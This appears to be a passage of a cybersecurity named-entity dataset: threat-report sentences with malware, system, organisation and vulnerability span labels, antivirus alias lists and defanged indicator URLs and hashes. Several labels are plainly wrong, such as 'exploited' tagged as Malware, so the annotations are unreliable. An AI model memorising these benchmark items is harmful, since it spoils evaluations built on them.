backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000194", "source": "cyner2_valid"}} {"text": "After all , a working product is often more important than a stable product .", "spans": {}, "info": {"id": "cyner2_valid_000195", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Joke:Win32/VB.K Win-Trojan/Aub.24576 VB.BYG Win32/Trojan.d25", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000196", "source": "cyner2_valid"}} {"text": "The attackers have taken down their communication channels and are 
probably looking for ways to assemble their tools in a different manner .", "spans": {}, "info": {"id": "cyner2_valid_000197", "source": "cyner2_valid"}} {"text": "Targets and victims included ASEAN governmental agencies and government departments, investment enterprises, military, law enforcement and border control organizations, embassies, university faculties and others.", "spans": {"Organization: ASEAN governmental agencies": [[29, 56]], "Organization: government departments, investment enterprises, military, law enforcement": [[61, 134]], "Organization: border": [[139, 145]]}, "info": {"id": "cyner2_valid_000198", "source": "cyner2_valid"}} {"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong .", "spans": {"Malware: XLoader": [[0, 7]], "System: Android": [[8, 15]]}, "info": {"id": "cyner2_valid_000199", "source": "cyner2_valid"}} {"text": "Further research showed that this component was the core of an operation involving multiple malware families we called Operation Windigo", "spans": {"Malware: multiple malware families": [[83, 108]]}, "info": {"id": "cyner2_valid_000200", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.Fiorn.Worm Worm.VB.CJ3 Worm.Moriogu Win32.Trojan.WisdomEyes.16070401.9500.9943 W32/VBTrojan.17E!Maximus W32.SillyFDC Win32/Moriogu.A WORM_VB.FUP Trojan.Win32.Scar.wexu Backdoor.Win32.VB.NDU Trojan.Romeo Trojan.VB.Win32.116 WORM_VB.FUP BehavesLike.Win32.Vilsel.mt W32/VBTrojan.17E!Maximus Worm:Win32/Moriogu.A TR/VB.dnz Worm:Win32/Moriogu.A Trojan.Heur.EF86F4 Win32.Trojan.VB.YZ HEUR/Fakon.mwf SScope.Trojan.Validium.va Win32/VB.NJU", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000201", "source": "cyner2_valid"}} {"text": "It is commonly exploited via the use of malicious Rich Text File RTF documents, a method used by the 
DRIDEX banking trojan discovered earlier this year.", "spans": {"Malware: exploited": [[15, 24]], "Malware: malicious": [[40, 49]], "Malware: DRIDEX banking trojan": [[101, 122]]}, "info": {"id": "cyner2_valid_000202", "source": "cyner2_valid"}} {"text": "The Trojanized apps were hosted by several well-known Android mobile markets, including more than 400 detected on Google Play.", "spans": {"Malware: Trojanized apps": [[4, 19]], "System: Android mobile": [[54, 68]], "System: Google Play.": [[114, 126]]}, "info": {"id": "cyner2_valid_000203", "source": "cyner2_valid"}} {"text": "The continuous scanning and exploitation of Elasticsearch servers is the most visible feature of these actors, and some actors have continued to infect and reinfect servers for weeks on end.", "spans": {"Vulnerability: exploitation": [[28, 40]], "System: Elasticsearch servers": [[44, 65]], "System: servers": [[165, 172]]}, "info": {"id": "cyner2_valid_000204", "source": "cyner2_valid"}} {"text": "This family of ransomware is directly purchased from the author via the Internet.", "spans": {"Malware: family of ransomware": [[5, 25]]}, "info": {"id": "cyner2_valid_000206", "source": "cyner2_valid"}} {"text": "The process starts when an SMS phishing message arrives at a user ’ s phone .", "spans": {}, "info": {"id": "cyner2_valid_000207", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Small.27136.N Trojan.Win32.Small!O Trojan/Small.ahk Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Trojan2.AFIB W32.Joydotto Win32/Cog.A WORM_HIDDEN.B Win.Trojan.Small-8611 Trojan.Win32.Small.ahk Trojan.Win32.Small.yrzl Troj.W32.Small!c Win32.Trojan.Small.Wstp Worm.Win32.Small.NBW WORM_HIDDEN.B W32/Trojan.WQKI-8211 Trojan.Win32.Small.27136 Trojan.Win32.Small.ahk Worm:Win32/Stercogs.A Trojan.Small Win32/Small.NBW Trojan.Small!ci/rCB0aMMk W32/MSVC.F!tr Win32/Trojan.ce9", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000208", "source": "cyner2_valid"}} {"text": 
"Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called Rocket Kitten AKA Operation Saffron Rose, Ajax Security Team, Operation Woolen-Goldfish as well as an older attack campaign called Newscasters.", "spans": {"System: infrastructure": [[17, 31]], "Malware: tools": [[36, 41]], "Organization: Ajax Security Team,": [[174, 193]]}, "info": {"id": "cyner2_valid_000209", "source": "cyner2_valid"}} {"text": "However, it is possible that their quantity will be constantly increasing, because virus writers are still busy distributing this malicious program.", "spans": {"Malware: malicious program.": [[130, 148]]}, "info": {"id": "cyner2_valid_000210", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HackTool.Win32!O HackTool.SqlCrack Tool.SqlCrack.Win32.5 Trojan/Hacktool.sqlcrack Win32.HackTool.Sqlcrack.b W32/Trojan.UHQ Win.Tool.SQLCrack-2 HackTool.Win32.SqlCrack Riskware.Win32.SqlCrack.hros Win32.Hacktool.Sqlcrack.Efki TrojWare.Win32.HackTool.Sqlcrack Tool.SQLck W32/Trojan.EFFV-1692 HackTool.HDSI.c HackTool/Win32.SqlCrack HackTool:Win32/SqlCrack.A Trojan.Johnnie.D46D6 ToolKit.Win32.SqlCrack.73729 HackTool.Win32.SqlCrack HackTool.SqlCrack Win32/HackTool.Sqlcrack", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000211", "source": "cyner2_valid"}} {"text": "The emails had subject lines that were intended to convince unsuspecting recipients that they were from a legitimate source.", "spans": {}, "info": {"id": "cyner2_valid_000212", "source": "cyner2_valid"}} {"text": "UPS Ship Notification, Tracking Number digits and Acknowledgement TBO-..-digits as subjects.", "spans": {}, "info": {"id": "cyner2_valid_000213", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan/W32.Small.36864.BEK Trojan.Win32.Bohu!O Trojan.Bohu Bohu.dll Dropper.Bohu.Win32.1 Trojan/Dropper.Bohu.a TROJ_GORIADU.SMY Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_GORIADU.SMY 
Win.Trojan.Bohu-7 Trojan.Win32.Bohu.a Trojan.Win32.BackdrDN.dcbln Trojan.Win32.A.Bohu.35840 Trojan.Goriadu Bohu.dll Trojan/Bohu.a W32.Trojan.Orsam Trojan/Win32.Bohu Trojan.Zusy.D5FA Trojan.Win32.Bohu.a Trojan/Win32.Goriadu.R15018 TrojanDropper.Bohu Win32/TrojanDropper.Bohu.A Trojan.Win32.Bohu.aab Trojan.DR.Bohu!0vTQVrN4gRk Trojan.Win32.Siglow.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000214", "source": "cyner2_valid"}} {"text": "Once Chrysaor is installed , a remote operator is able to surveil the victim 's activities on the device and within the vicinity , leveraging microphone , camera , data collection , and logging and tracking application activities on communication apps such as phone and SMS .", "spans": {"Malware: Chrysaor": [[5, 13]]}, "info": {"id": "cyner2_valid_000215", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsIemusi.715E Backdoor.Win32.Hupigon!O Backdoor.Hupigon.dkxa.n2 Backdoor/Hupigon.dkxa Backdoor.Hupigon!sk7FJKqXwDM W32/Backdoor2.CMTX Trojan.Win32.Hupigon.juni Backdoor.Win32.Hupigon.2794496[h] BackDoor.Pigeon.38533 Backdoor.Hupigon.Win32.18917 Backdoor/PcClient.nuv TR/Packed.11704 Trojan[Backdoor]/Win32.Hupigon Trojan.Heur.JP.QkuaaWzcbLmb Win-Trojan/Hupigon.2794496 Backdoor:Win32/Remoab.B Backdoor.Hupigon Trojan-Spy.Banker", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000216", "source": "cyner2_valid"}} {"text": "Command and control API calls ViperRAT samples are capable of communicating to C2 servers through an exposed API as well as websockets .", "spans": {"Malware: ViperRAT": [[30, 38]]}, "info": {"id": "cyner2_valid_000218", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9868 Trojan.Win32.APosT.ey Trojan.Win32.JBFM5730.dztwsc DLOADER.Trojan BehavesLike.Win32.PUPXAB.jm Trojan.Win32.APosT.ey W32/APosT.EY!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000219", "source": 
"cyner2_valid"}} {"text": "This attack leverages PowerShell, a Windows scripting language, to execute commands and remain persistent on the host machines.", "spans": {"System: PowerShell,": [[22, 33]], "System: Windows": [[36, 43]], "System: host machines.": [[113, 127]]}, "info": {"id": "cyner2_valid_000220", "source": "cyner2_valid"}} {"text": "The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router's admin web interface.", "spans": {"Malware: trojan,": [[4, 11]], "System: router's admin web interface.": [[101, 130]]}, "info": {"id": "cyner2_valid_000221", "source": "cyner2_valid"}} {"text": "HummingWhale has also been observed hiding the original malicious app once it 's installed and trying to improve its Google Play reputation by automatically generating posts disguised as positive user comments and ratings .", "spans": {"Malware: HummingWhale": [[0, 12]], "System: Google Play": [[117, 128]]}, "info": {"id": "cyner2_valid_000222", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan-Dropper/W32.Injector.275968.B TrojanDropper.Injector Dropper.Injector.Win32.69255 Trojan/Turla.ai TROJ_TURLA.YLF Win.Trojan.Pfinet-1 Win32.Trojan-Dropper.Injector.BG Trojan-Dropper.Win32.Injector.kkkc Trojan.Win32.Inject.ddwwnm Troj.Dropper.W32.Injector!c Trojan.DownLoader11.27456 TROJ_TURLA.YLF BehavesLike.Win32.BrowseFox.dh W32/Trojan.JAZX-6590 TrojanDropper.Injector.atwe BDS/Pfinet.A.1 Trojan/Win32.Epiccosplay Trojan-Dropper.Win32.Injector.kkkc Backdoor:Win32/Pfinet.A!dha TrojanDropper.Injector Trj/Chgt.C Trojan.DR.Injector!Tx5iQYbcsFA Trojan-Dropper.Win32.Injector W32/Injector.KKKC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000223", "source": "cyner2_valid"}} {"text": "URL: hxxp:// alex-luthor.", "spans": {}, "info": {"id": "cyner2_valid_000224", "source": "cyner2_valid"}} {"text": "We were also able to analyze some GolfSpy samples sourced from the Trend Micro mobile app 
reputation service .", "spans": {"Malware: GolfSpy": [[34, 41]], "Organization: Trend Micro": [[67, 78]]}, "info": {"id": "cyner2_valid_000225", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Vivael.A@mm Email-Worm.Win32.Colevo!O Worm.Meve W32/Colevo.a@MM Win32.Worm.Unp.e W32/EmailWorm.NAS W32.Vivael@mm Win32/Colevo.B Win32.Vivael.A@mm Email-Worm.Win32.Colevo.a Win32.Vivael.A@mm Trojan.Win32.Colevo.emgs Email.Worm.W32!c Worm.Win32.Colevo.A.unp Win32.Vivael.A@mm Win32.HLLM.Colevo.1 Worm.Colevo.Win32.6 W32/Colevo.a@MM Trojan-Downloader.Win32.Banload W32/Worm.ACFJ-5033 I-Worm/Colevo.a Worm[Email]/Win32.Colevo Worm:Win32/Meve.A@mm Win32.Vivael.E90817 Email-Worm.Win32.Colevo.a Worm.Colevo Win32.Vivael.A@mm Win32.Vivael.A@mm Trj/CI.A Win32/Colevo.A.unp Win32.Worm-email.Colevo.Hssl W32/Colevo.A@mm", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000226", "source": "cyner2_valid"}} {"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface .", "spans": {"System: Android": [[4, 11]]}, "info": {"id": "cyner2_valid_000227", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor-DWV.a Dropper.Droco.Win32.123 Packer.W32.Krap.bh!c Trojan/Dropper.Droco.a Trojan.Graftor.D46BC TROJ_WEVARM.SM Backdoor.Trojan TROJ_WEVARM.SM Packed.Win32.Krap.bh Trojan.Win32.Krap.dxousm Spyware.Droco.Dr.20992.K TrojWare.Win32.TrojanDropper.Droco.A BackDoor.IRC.Sdbot.18753 BehavesLike.Win32.Sytro.mm TrojanDropper.Droco.a Trojan[Packed]/Win32.Krap TrojanDropper:Win32/Droco.A Packed.Win32.Krap.bh", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000228", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Warood Backdoor.Win32.Warood Backdoor:Win32/Warood.B", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000229", 
"source": "cyner2_valid"}} {"text": "Indicators of compromise ( IOC ) URLs hxxp : //5.9.33.226:5416 hxxp : //172.110.10.171:85/testcc.php hxxp : //sub1.tdsworker.ru:5555/3ds/ Hash values Package.apk - A342a16082ea53d101f556b50532651cd3e3fdc7d9e0be3aa136680ad9c6a69f eCommon.dl - 604deb75eedf439766896f05799752de268baf437bf89a7185540627ab4a4bd1 Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed “ Cerberus ” , being rented out on underground forums .", "spans": {"Malware: Cerberus": [[422, 430], [562, 570]], "Organization: ThreatFabric": [[501, 513]], "System: Android": [[535, 542]]}, "info": {"id": "cyner2_valid_000230", "source": "cyner2_valid"}} {"text": "Linux.Mirai is a malware designed to hijack busybox systems in order to perform DDoS attacks.", "spans": {"Malware: malware": [[17, 24]], "System: busybox systems": [[44, 59]]}, "info": {"id": "cyner2_valid_000231", "source": "cyner2_valid"}} {"text": "All of these apps are developed by the same framework and hence have the same package name and certificate information as seen in Figure 12. 
certificate Figure 12 : Package name and certificate information .", "spans": {}, "info": {"id": "cyner2_valid_000232", "source": "cyner2_valid"}} {"text": "rootdaemon will first attempt to jailbreak the device using a modified version of the DirtyCow exploit .", "spans": {"Vulnerability: DirtyCow exploit": [[86, 102]]}, "info": {"id": "cyner2_valid_000234", "source": "cyner2_valid"}} {"text": "Later, the attackers set up two fake websites pretending to be a University of Oxford conference sign-up page and a job application website.", "spans": {"Organization: University of Oxford": [[65, 85]]}, "info": {"id": "cyner2_valid_000236", "source": "cyner2_valid"}} {"text": "Much of the information being stolen appear to be military-related .", "spans": {}, "info": {"id": "cyner2_valid_000237", "source": "cyner2_valid"}} {"text": "For example , this is how opcode 0x1A is implemented : The opcode should represent a JB ( Jump if below ) function , but it ’ s implemented through set carry ( STC ) instruction followed by a JMP into the dispatcher code that will verify the carry flag condition set by STC .", "spans": {}, "info": {"id": "cyner2_valid_000238", "source": "cyner2_valid"}} {"text": "In doing so , the Trojan can be sure that its malicious module will be executed with system rights .", "spans": {}, "info": {"id": "cyner2_valid_000240", "source": "cyner2_valid"}} {"text": "However, Retefe is still being distributed in recent spam campaigns, targeting Swiss Internet users.", "spans": {"Malware: Retefe": [[9, 15]], "Organization: Swiss Internet users.": [[79, 100]]}, "info": {"id": "cyner2_valid_000241", "source": "cyner2_valid"}} {"text": "Based on the way the campaign has developed, it won't be surprising to see additional evolutions from ChessMaster in the future.", "spans": {}, "info": {"id": "cyner2_valid_000242", "source": "cyner2_valid"}} {"text": "In these campaigns, Pawn Storm used a previously unknown zero-day in Adobe's Flash CVE-2016-7855, fixed on October 
26, 2016 with an emergency update in combination with a privilege escalation in Microsoft's Windows Operating System CVE-2016-7255 that was fixed on November 8, 2016.", "spans": {"Vulnerability: unknown zero-day": [[49, 65]], "System: Adobe's Flash": [[69, 82]], "Vulnerability: privilege escalation": [[171, 191]], "System: Microsoft's Windows Operating System": [[195, 231]]}, "info": {"id": "cyner2_valid_000243", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Ransom.Crowti.A6 Spyware.Boaxxe Trojan.Injector.Win32.564600 Trojan.Symmi.D10640 Win32.Trojan.Kryptik.jm W32/Trojan.ITLI-7905 BehavesLike.Win32.VirRansom.cc Trojan.PSW.Fareit.fnz Trojan[Ransom]/Win32.Scatter Ransom:Win32/Vaultcrypt.A Trojan/Win32.Miuref.C1508943 TrojanPSW.Fareit Trj/RansomCrypt.E Trojan.Win32.Injector W32/Injector.DDEC!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000244", "source": "cyner2_valid"}} {"text": "Verify Apps : Ensure Verify Apps is enabled .", "spans": {}, "info": {"id": "cyner2_valid_000245", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Trojan.Boaxxe.E Trojan/Dropper.Injector.corb Win32.Trojan.WisdomEyes.16070401.9500.9996 Ransom_Reveton.R00EC0DB518 Packed.Win32.Krap.iu TrojWare.Win32.Kazy.FOF Trojan.Inject.64356 Dropper.Injector.Win32.14781 Ransom_Reveton.R00EC0DB518 BehavesLike.Win32.Dropper.wz Trojan.Crypt Trojan[Packed]/Win32.Krap Win32.Troj.Injector.kcloud Trojan.Boigy.1 Packed.Win32.Krap.iu Ransom:Win32/Reveton.A Spyware/Win32.Carberp.R25061 TrojanDropper.Injector Bck/Qbot.AO Trojan.Kryptik!7eMffExEPUI", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000246", "source": "cyner2_valid"}} {"text": "Also known as BaneChant MM Core is a file-less APT which is executed in memory by a downloader component.", "spans": {"Malware: BaneChant": [[14, 23]], "Malware: MM Core": [[24, 31]], "Malware: downloader component.": [[84, 105]]}, "info": {"id": "cyner2_valid_000247", 
"source": "cyner2_valid"}} {"text": "The dotted arrows represent the use of a particular C2 server by a specific app to send information and fetch instructions .", "spans": {}, "info": {"id": "cyner2_valid_000248", "source": "cyner2_valid"}} {"text": "A backdoor also known as: WS.Reputation.1", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000249", "source": "cyner2_valid"}} {"text": "In the case of FinFisher , however , we could not find a good existing interactive disassembler ( IDA ) plugin that can normalize the code flow .", "spans": {"Malware: FinFisher": [[15, 24]]}, "info": {"id": "cyner2_valid_000250", "source": "cyner2_valid"}} {"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware .", "spans": {}, "info": {"id": "cyner2_valid_000251", "source": "cyner2_valid"}} {"text": "After some major upgrade , by mid-June , the “ Agent Smith ” campaign reached its peak .", "spans": {"Malware: Agent Smith": [[47, 58]]}, "info": {"id": "cyner2_valid_000252", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.FlyStudio!O3t91C2ADog Trojan.Adclicker W32/DLoader.AHYXT TROJ_ADCLIK.SM TrojWare.Win32.FlyStudio.~UJ TR/FlyStudio.QI.40 TROJ_ADCLIK.SM Riskware.RiskTool.Win32.HideProc!IK Trojan/FlyStudio.aar Trojan:Win32/Geshab.A Trojan.Adclicker!rem not-a-virus:RiskTool.Win32.HideProc", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000254", "source": "cyner2_valid"}} {"text": "This vulnerability could also be exploited using other Office file formats.", "spans": {"Vulnerability: vulnerability": [[5, 18]], "Vulnerability: exploited": [[33, 42]]}, "info": {"id": "cyner2_valid_000256", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HW32.Packed.2FFC Backdoor/W32.Matsnu.596864 Trojan.Silcon.C4 Backdoor.Matsnu.Win32.749 Backdoor.W32.Matsnu!c Trojan.Razy.D9CF4 Win32.Trojan.WisdomEyes.16070401.9500.9979 TROJ_NYMAIM.SMA Backdoor.Win32.Matsnu.fir 
Trojan.Win32.Inject.eboqsu Trojan.Win32.Z.Matsnu.596864 Trojan.Inject2.19810 TROJ_NYMAIM.SMA W32/Trojan.VBQR-6623 Backdoor.Matsnu.kz TR/Crypt.ZPACK.smooz Trojan[Backdoor]/Win32.Matsnu Backdoor.Win32.Matsnu.fir Backdoor/Win32.Matsnu.R178662 Win32.Backdoor.Matsnu.Hoos Trojan.Win32.Injector Win32/Trojan.29d", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000257", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Backdoor.Androm.A5 Backdoor.Androm.Win32.42730 TROJ_LETHIC.SMT Trojan.Win32.Waldek.eovykd Virus.Win32.Virut.ua BackDoor.IRC.NgrBot.1034 TROJ_LETHIC.SMT BehavesLike.Win32.Trojan.fh Win32/Virut.bv Trojan/Win32.Waldek Trojan:Win32/Qadars.C!bit Trojan.Zusy.D39FAB Backdoor.Androm Trojan.Waldek Win32/Virut.NBP P2P-Worm.Win32.Palevo Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000258", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.eHeur.Malware08 TROJ_VENIK_GJ1000AE.UVPM TROJ_VENIK_GJ1000AE.UVPM BackDoor.FengSpy.33 BehavesLike.Win32.Dropper.lm Packed.Win32.PePatch TR/Graftor.80057.2 Trojan.Zusy.DB9CF TrojanDropper:Win32/Venik.B Trj/Dtcontx.I", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000259", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Bagle.FS@mm Win32.Bagle.FS@mm Trojan/Downloader.Bagle.y Trojan.DL.Bagle.JX W32/Mitglieder.TO Trojan.Lodeight.C Mitglied.YI Win32/Lumebag.H TROJ_BAGLE.ACL Worm.Bagle-58 Trojan-Downloader.Win32.Bagle.y Win32.Bagle.FS@mm Trojan.Win32.Bagle.himc Virus.Win32.Heur.c Worm.Win32.Bagle.GS Win32.Bagle.FS@mm Win32.HLLM.Beagle.35306 TROJ_BAGLE.ACL TrojanDownloader.BBEagle.ag Win32.TrojDownloader.Beagle.y.kcloud TrojanDownloader:Win32/Bagle.BA Trojan.Win32.Downloader-Bagle.35306 Win32.Bagle.FS@mm W32/Mitglieder.MHFM-7641 Worm/Win32.Bagle MalwareScope.Trojan-PSW.Pinch.1 Trojan.Lodeight Win32/Bagle.GS Trojan.DL.Bagle.em Trojan-Downloader.Win32.Bagle.Y W32/Bagle.KP!tr.dldr W32/Informer.A.worm", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000260", "source": "cyner2_valid"}} {"text": "This gist contains brief details of additional Paranoid PlugX files, likely associated with a sophisticated attacker.", "spans": {"Malware: Paranoid PlugX": [[47, 61]]}, "info": {"id": "cyner2_valid_000261", "source": "cyner2_valid"}} {"text": "A backdoor also known as: PSWTool.Win32.NetPass!O HackTool.Mailpassview Tool.NetPass.Win32.134 W32/Meredrop.ABY Win32/Droplet.BH TROJ_NETPASS_0000006.TOMA Win.Trojan.Dialupass-19 Riskware.Win32.NetPass.wdjc Trojan.Inject.5198 AdWare/NetPass.a TR/PSW.Stealer.H Trojan[Dropper]/Win32.Injector.meun PWS:Win32/Wedsnot.A Trojan.Dropper.78 Trojan.Meredrop!8s1wx4pKREA Trojan-PWS.Stealer.H", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000262", "source": "cyner2_valid"}} {"text": "Fortinet We start our correlation with the analysis of the exploit payload - a remote administration tool RAT with MD5 6bde5462f45a230edc7e7641dd711505 detected as MSIL/Agent.QOO!tr.", "spans": {"Organization: Fortinet": [[0, 8]], "Malware: exploit payload": [[59, 74]], "Malware: a remote administration tool RAT": [[77, 109]]}, "info": {"id": "cyner2_valid_000263", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W2KM_FAREITDRPR.ZJCH-A1 Troj.Downloader.Msword!c W97M.MulDrop.63 W2KM_FAREITDRPR.ZJCH-A1 W97M/Dropper.q W2000M/Downloader.C HEUR.VBA.Trojan.d W97M/Dropper.q Win32/Virus.Downloader.947", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000264", "source": "cyner2_valid"}} {"text": "Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code.", "spans": {"Malware: macro": [[120, 125]], "Malware: malicious code.": [[140, 155]]}, "info": {"id": "cyner2_valid_000265", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Trojan.Win32.OnLineGames.brtky PWS:Win32/Pebox.A", 
"spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000266", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9600 W32/Backdoor2.HTKJ Backdoor.Miancha Backdoor.Win32.Miancha.a Trojan.Win32.Miancha.csunga Win32.Backdoor.Miancha.Gvn W32/Backdoor.QNKK-3506 BDS/Miancha.A Trojan[Backdoor]/Win32.Miancha Backdoor:Win32/Miancha.A Backdoor.W32.Miancha.a!c Backdoor.Win32.Miancha.a Backdoor.Miancha! Win32/Trojan.708", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000267", "source": "cyner2_valid"}} {"text": "On a lazy Sunday morning we got a message from one of our Polish readers about a strange behavior of his home router.", "spans": {}, "info": {"id": "cyner2_valid_000268", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Win32.Turla.D Trojan/W32.Nus.210944 Backdoor.Turla Trojan.Turla.Win32.21 Win32.Turla.D Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Turla BKDR_TURLA.SM Win32.Rootkit.Uroburos.B Rootkit.Win32.Turla.o Win32.Turla.D Trojan.Win32.Turla.cwxmwa Win32.Turla.D Backdoor:W32/Turla.A BackDoor.Turla.15 Rootkit.Win32.Turla Rookit.Turla.a BDS/Turla.A.2 Trojan/Win32.Nus Trojan/Win32.Turla.C285799 Rootkit.Win32.Turla.o Backdoor:WinNT/Turla.A!dha Win32.Turla.D Rootkit.Turla Win32.Rootkit.Turla.Efkj W32/BackDoor.1WJ!tr", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000269", "source": "cyner2_valid"}} {"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available .", "spans": {}, "info": {"id": "cyner2_valid_000270", "source": "cyner2_valid"}} {"text": "Working with U.S. 
and international partners, DHS and FBI identified victims in these sectors.", "spans": {"Organization: U.S.": [[13, 17]], "Organization: international partners, DHS": [[22, 49]], "Organization: FBI": [[54, 57]], "Organization: sectors.": [[86, 94]]}, "info": {"id": "cyner2_valid_000271", "source": "cyner2_valid"}} {"text": "A backdoor also known as: Bloodhound.HLP.1 HEUR_HLPDYN.T EXP/HlpDrop.B Trojan:Win32/HlpDrop.A Win32/Trojan.Exploit.919", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000272", "source": "cyner2_valid"}} {"text": "During this stage , the loader may also call a certain API using native system calls , which is another way to bypass breakpoints on API and security solutions using hooks .", "spans": {}, "info": {"id": "cyner2_valid_000273", "source": "cyner2_valid"}} {"text": "Intel Security has recently seen a new kind of ransomware–Zcrypt—that can self-replicate.", "spans": {"Organization: Intel Security": [[0, 14]], "Malware: ransomware–Zcrypt—that": [[47, 69]]}, "info": {"id": "cyner2_valid_000274", "source": "cyner2_valid"}} {"text": "A backdoor also known as: W32.HfsAutoB.1919 Backdoor/W32.RMFdoor.229438 Backdoor.Win32.A.RMFdoor.229438 Backdoor.Win32.RMFdoor.10 Win32.Hack.RMFdoor.kcloud Trojan.Heur.GM.04081640A0 Trojan/Win32.Hacktack.R134105 Win32/RMFdoor.10 Win32.Trojan.Rmfdoor.Pdmq", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000275", "source": "cyner2_valid"}} {"text": "As Brian Krebs wrote in one of his recent post, Philadelphia is a ransomware-as-a-service crime ware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires.", "spans": {"Organization: Brian Krebs": [[3, 14]], "Malware: Philadelphia": [[48, 60]], "Malware: ransomware-as-a-service crime ware package": [[66, 108]], "Malware: ransomware": [[202, 212]]}, "info": {"id": "cyner2_valid_000276", "source": "cyner2_valid"}} {"text": "A backdoor also known as: 
Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Pled BKDR_PLEAD.ZTCC-A Trojan.Win32.Dwn.djqjgz Trojan.DownLoader11.48076 BKDR_PLEAD.ZTCC-A W32/Trojan.MQWA-4490 TR/AD.Bluether.hsuud Trojan:Win32/Bluether.B!dha Trj/CI.A", "spans": {"Malware: backdoor": [[2, 10]]}, "info": {"id": "cyner2_valid_000277", "source": "cyner2_valid"}} {"text": "As a result , due to such an unusual compilation process , there were signs in the dex file that point to dexlib , a library used by the Smali tool to assemble dex files .", "spans": {}, "info": {"id": "cyner2_valid_000278", "source": "cyner2_valid"}} {"text": "So far the damage does not seem as wide spread as WannaCry or NotPetya.", "spans": {"Malware: WannaCry": [[50, 58]], "Malware: NotPetya.": [[62, 71]]}, "info": {"id": "cyner2_valid_000279", "source": "cyner2_valid"}} {"text": "A backdoor also known as: HackTool.Win32.Sniffer.WpePro!O Hacktool.Wpepro Win32.Trojan.WpePro.a W32/Trojan.UOTN-4107 Win.Trojan.Sniffer-1 HackTool.Win32.Sniffer.WpePro.uud Trojan.Win32.MLW.bobug HackTool.W32.Sniffer.WpePro.l4ik Win32.Hacktool.Sniffer.Dbg Program.Wpe.632 Tool.Sniffer.Win32.6 HackTool.Win32.Sniffer.WpePro W32/Trojan2.JZBH HackTool/Sniffer.ik SPR/Sniffer.Wpe.a.1 HackTool/Win32.WpePro.rxi Trojan.Win32.Z.Sniffer.2084864 HackTool.Win32.Sniffer.WpePro.uud 